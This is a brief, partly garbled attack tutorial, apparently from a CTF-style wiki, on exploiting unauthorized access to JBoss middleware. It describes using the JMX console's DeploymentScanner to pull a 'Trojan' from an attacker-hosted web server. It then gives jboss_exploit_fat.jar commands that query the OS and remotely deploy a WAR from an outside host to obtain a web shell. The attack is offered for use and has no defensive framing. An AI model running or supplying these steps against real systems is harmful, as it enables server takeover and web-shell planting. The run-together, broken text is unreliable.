1,jboss unauthorized access to the deployment Trojan
Found JBoss default page, tap control page
Click Jboss.deployment to go to the App Deployment page
You can also enter this URL directly into
http://www.ctfswiki.com:8080//jmxconsole/HtmlAdaptoraction=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL
Build Remote Trojan server, can use Apache and other Web server to build, through the Addurl parameters for the remote deployment of Trojans
Successful deployment, access to Trojan address
Finally attach a JBoss unauthorized access to exp, standby, instructions for use
1. 查看系统名称java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName2. 查看系统版本java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion3.远程部署warjava -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://192.168.20.10/no.war获得shell地址:www.any.com:8080/no/index.jsp
Web middleware--jboss unauthorized access,